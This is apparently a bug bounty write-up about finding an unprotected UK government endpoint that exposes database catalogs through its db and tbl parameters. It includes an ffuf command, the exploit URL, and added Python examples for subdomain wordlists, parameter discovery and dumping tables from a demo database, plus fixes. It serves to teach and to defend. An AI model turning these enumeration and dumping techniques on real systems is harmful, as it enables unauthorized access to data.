Hello everyone, it's Ahmad Mansour again, an 18-year-old penetration tester and sometimes bug bounty hunter. Without further intro, let's get into today's topic: hacking the UK government, and finding and reporting multiple critical vulnerabilities.
NOTE: this was done ethically, as part of a legal bug bounty programme.
First of all, as in any methodology, I started by enumerating subdomains of my target using active and passive techniques and tried to automate the process with some tools. The main issue was that the domain was still fairly new (less than 3 years old), so there was hardly any passive data to gather from third-party services and tools.
So I had to dig deeper to find a good subdomain to test, rather than going after the main domain, which was mostly an informational page. I built my own subdomain wordlist (a custom one based on the target's keywords) and started fuzzing for subdomains with ffuf:
./ffuf -w /root/Desktop/wordlist.txt -u http://FUZZ.ab.com -of html -o result
After a bit of fuzzing I got a subdomain with a 200 response, which means a valid page, but it was a blank, empty page.
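The custom wordlist is the part that made this work, so here is an added example of how to build one; it is not the author's script, and the keywords, environment tokens and file name in it are constructed placeholders. It turns a handful of words taken from the target's own pages into label permutations (keyword plus environment token, both orders, three separators, keyword pairs), drops anything that is not a valid DNS label, and writes the result in the one-word-per-line format ffuf expects.

```python
import itertools
import re

# Constructed inputs: keywords harvested from the target's own pages (service
# names, team names, acronyms). Replace with what you collect per engagement.
TARGET_KEYWORDS = ["portal", "claims", "gateway"]

# Tokens that commonly prefix or suffix internal hostnames.
ENV_TOKENS = ["dev", "test", "uat", "staging", "beta", "old", "api", "admin"]
SEPARATORS = ["", "-", "."]

# One DNS label: letters/digits, hyphens only in the middle. A "." separator
# yields two labels (dev.portal); ffuf substitutes FUZZ verbatim, so that
# becomes dev.portal.target in the request.
_LABEL = re.compile(r"^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?$")


def is_valid_host_fragment(name: str) -> bool:
    """True when every dot-separated part is a syntactically valid DNS label."""
    return all(_LABEL.match(part) for part in name.split("."))


def build_wordlist(keywords, env_tokens=ENV_TOKENS, separators=SEPARATORS):
    """Return a sorted, de-duplicated list of target-specific subdomain candidates."""
    kws = [k.strip().lower() for k in keywords if k.strip()]
    words = set(kws) | set(env_tokens)
    for kw, env in itertools.product(kws, env_tokens):
        for sep in separators:
            words.add(f"{kw}{sep}{env}")
            words.add(f"{env}{sep}{kw}")
    for a, b in itertools.permutations(kws, 2):
        for sep in separators:
            words.add(f"{a}{sep}{b}")
    return sorted(w for w in words if is_valid_host_fragment(w))


def write_wordlist(path: str, words) -> int:
    """Write one candidate per line (the format ffuf -w reads); return the count."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    wl = build_wordlist(TARGET_KEYWORDS)
    print(write_wordlist("wordlist.txt", wl), "candidates written")
```

Feed the output file to `ffuf -w wordlist.txt -u http://FUZZ.<target>`; a few hundred target-specific candidates usually find more than a generic 100k-line list against a young domain, because the generic list was built from other people's hostnames.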
Never leave a blank or 404 page untested. No one builds an empty website and hosts it online; imagine setting up a subdomain or domain for yourself and uploading nothing to it.
So I went straight to directory brute forcing, that is, fuzzing for directories and hidden files,
and found an API directory that caught my interest: /name related to app/. It returned 403, so I fuzzed inside it and found
/path/app.php
It was really weird; I knew something was hidden there, so I ran another brute-force attack, this time parameter-based: trying candidate parameter names with a script/tool (yes, I love brute forcing targets, it uncovers unexpected hidden endpoints). Two parameters got a reaction: db and tbl.
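Parameter brute forcing works by sending candidate names and watching for any response that differs from a baseline. The following is an added example of that technique, not the author's tool or the real app.php: the `fake_app` function is a constructed stand-in whose behaviour is assumed (blank page until both keys are present, a PHP-style notice when only one of the pair is supplied), and the candidate list is constructed too. The discovery routine sends candidates in chunks and bisects any chunk that changes the response, so a few thousand names cost tens of requests rather than thousands.

```python
import hashlib
from urllib.parse import urlencode


# Constructed stand-in for the hidden app.php. The real endpoint's source is
# not on the page; this fake only mimics the described behaviour (blank page
# until the right query-string keys appear) plus an assumed PHP-style notice
# when one of the pair is missing, which is the signal discovery keys on.
def fake_app(params: dict) -> tuple:
    db, tbl = params.get("db"), params.get("tbl")
    if db and tbl:
        return 200, f"<table><tr><td>rows of {db}.{tbl}</td></tr></table>"
    if db or tbl:
        missing = "tbl" if db else "db"
        return 200, f"<b>Notice</b>: Undefined index: {missing} in app.php"
    return 200, ""  # the blank page the author saw


def http_requester(base_url: str):
    """Adapter for a real target (not exercised offline): GET base_url?k=v&..."""
    import urllib.error
    import urllib.request

    def do(params: dict) -> tuple:
        url = f"{base_url}?{urlencode(params)}"
        try:
            with urllib.request.urlopen(url, timeout=10) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.code, err.read().decode("utf-8", "replace")

    return do


def fingerprint(status: int, body: str) -> tuple:
    # An exact hash is fine for static pages; strip timestamps, CSRF tokens
    # and nonces first on dynamic ones or every probe looks "different".
    return status, len(body), hashlib.sha256(body.encode()).hexdigest()


def discover_params(request, candidates, chunk_size=50, value="1"):
    """Return the query-string keys the endpoint reacts to.

    The baseline request carries a bogus key, so an app that reflects or
    rejects unknown keys still compares equal to itself. Each chunk whose
    fingerprint differs is split in half until single names remain.
    Keep chunk_size below the server's parameter cap (PHP's max_input_vars
    defaults to 1000) or a large chunk is silently truncated."""
    baseline = fingerprint(*request({"zz_canary_zz": value}))
    found = []

    def probe(names):
        if fingerprint(*request({n: value for n in names})) == baseline:
            return
        if len(names) == 1:
            found.append(names[0])
            return
        mid = len(names) // 2
        probe(names[:mid])
        probe(names[mid:])

    for i in range(0, len(candidates), chunk_size):
        probe(candidates[i:i + chunk_size])
    return sorted(set(found))


# Constructed candidate list; a real run uses a few thousand names from
# parameter wordlists plus names scraped from the target's JS and forms.
CANDIDATES = ["id", "page", "q", "user", "file", "lang", "debug", "db",
              "table", "tbl", "action", "view", "search", "token"]

if __name__ == "__main__":
    print("reactive parameters:", discover_params(fake_app, CANDIDATES))
```

One caveat: bisection only finds parameters that change the response on their own. If two keys matter only when supplied together and neither produces any difference alone, the chunk that contained both will differ but each half will match the baseline, and both are lost; for that case, fall back to testing each surviving half with the other half's keys held constant.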
So I crafted my URL:
subdomain.target.gov.uk/path/app.php?db=information_schema&tbl=SCHEMATA
And guess what? I was able to list the database names. information_schema.SCHEMATA is the MySQL/MariaDB catalog view that holds one row per database visible to the connected user, so getting it back means the endpoint builds its query from whatever db and tbl values it is given.
I could then repeat the same trick against other catalog tables to list the tables of a specific database and escalate the attack from there.
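The page does not show app.php's source, so the following is an added, hypothetical reconstruction (not the site's real code) of the shape that produces this behaviour, beside a hardened version. It uses SQLite so it runs offline, with sqlite_master standing in for MySQL's information_schema; the table names and rows are constructed. The attacker side does exactly what the write-up describes, reading the catalog and then every table it names; the fix is an allow-list, because table and database identifiers cannot be passed as bound placeholders.

```python
import sqlite3


# Constructed demo database standing in for the site's backend. SQLite's
# sqlite_master plays the role MySQL's information_schema played above.
def setup_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE app_users (id INTEGER, name TEXT);
        INSERT INTO app_users VALUES (1, 'alice');
        CREATE TABLE app_secrets (k TEXT, v TEXT);
        INSERT INTO app_secrets VALUES ('api_key', 'constructed-demo-value');
    """)
    return conn


def vulnerable_query(conn, db: str, tbl: str):
    """Assumed shape of the hidden app.php: caller-supplied identifiers are
    pasted into the statement, so any db/table the DB user can read is exposed."""
    return conn.execute(f"SELECT * FROM {db}.{tbl}").fetchall()


def attacker_dump(conn) -> dict:
    """The post's technique carried one step further: read the catalog to learn
    the table names, then pull every table through the same endpoint."""
    catalog = vulnerable_query(conn, "main", "sqlite_master")
    tables = [row[1] for row in catalog if row[0] == "table"]  # (type, name, ...)
    return {t: vulnerable_query(conn, "main", t) for t in tables}


# Hardened version: an explicit allow-list of what the page is meant to show.
ALLOWED = {"main": {"app_users"}}


def _quote_ident(name: str) -> str:
    """Double-quote an identifier, escaping embedded quotes (SQL standard)."""
    return '"' + name.replace('"', '""') + '"'


def safe_query(conn, db: str, tbl: str):
    """Validate against the allow-list first; quote the survivors as a second
    line of defence so even an odd allowed name cannot break the statement."""
    if db not in ALLOWED or tbl not in ALLOWED[db]:
        raise PermissionError(f"{db}.{tbl} is not an exposed table")
    sql = f"SELECT * FROM {_quote_ident(db)}.{_quote_ident(tbl)}"
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    c = setup_demo_db()
    print("attacker sees:", attacker_dump(c))
    try:
        safe_query(c, "main", "sqlite_master")
    except PermissionError as e:
        print("hardened handler blocked:", e)
```

Two points for the defending side: the allow-list belongs in the application, not in a regex on the input, and the database account behind such an endpoint should be limited to the one schema it needs, so that a catalog query cannot list every database on the server even if the code check is bypassed.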
Takeaways:
As a pentester or bug bounty hunter:
1- Stop brute forcing blindly with the same wordlist everyone is spamming at bug bounty targets; build one from the target's own keywords
2- Never trust a blank or 404 page; these can hide gems
3- Always brute force parameters, you never know what's hidden
If you are a dev or website owner:
1- Remove unwanted, beta and unused subdomains (always check what you are hosting; maybe you forgot something)
2- Remember that hidden files or odd file names do not stop anyone from reaching them. Some hackers think outside the box, so assume that everything you put on the internet is exposed